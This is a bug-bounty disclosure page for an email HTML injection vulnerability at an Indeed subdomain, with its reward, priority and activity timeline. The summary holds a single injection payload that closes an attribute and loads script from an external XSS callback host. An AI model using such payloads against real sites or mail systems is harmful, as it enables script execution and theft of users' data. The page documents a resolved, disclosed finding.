Email HTML Injection at https://baito.indeed.com

Disclosed by
neelutiwari's avatar
neelutiwari
  • Engagement Indeed
  • Disclosed date almost 3 years ago
  • Reward $100
  • Priority P4 Bugcrowd's VRT priority rating
  • Status Resolved This vulnerability has been accepted and fixed
Summary by neelutiwari

<s>can we disclose this ?
"><script src=https://avanishpathak.xss.ht></script>

Activity
  1. neelutiwari’s avatar
    neelutiwari sent a message

    ()

  2. Kyle_indeed’s avatar
    Kyle_indeed Customer published the disclosure report

    ()

  3. neelutiwari’s avatar
    neelutiwari requested disclosure

    ()

  4. Jarvis’s avatar
    Jarvis Customer changed the state to Resolved

    ()

  5. r_indeed’s avatar
    r_indeed Customer rewarded neelutiwari 5 points

    ()

  6. r_indeed’s avatar
    r_indeed Customer changed the state to Unresolved

    ()

  7. r_indeed’s avatar
    r_indeed Customer rewarded neelutiwari $100

    ()

  8. cliff_bugcrowd’s avatarbugcrowd logo
    cliff_bugcrowd changed the state to Triaged

    ()

  9. cliff_bugcrowd’s avatarbugcrowd logo
    cliff_bugcrowd sent a message

    ()

  10. neelutiwari’s avatar
    neelutiwari resolved a blocker for Indeed by providing information

    ()

  11. neelutiwari’s avatar
    neelutiwari sent a message

    ()

  12. neelutiwari’s avatar
    neelutiwari sent a message

    ()

  13. cliff_bugcrowd’s avatarbugcrowd logo
    cliff_bugcrowd created a blocker on the researcher to provide information

    ()

  14. cliff_bugcrowd’s avatarbugcrowd logo
    cliff_bugcrowd sent a message

    ()

  15. neelutiwari’s avatar
    neelutiwari created the submission

    ()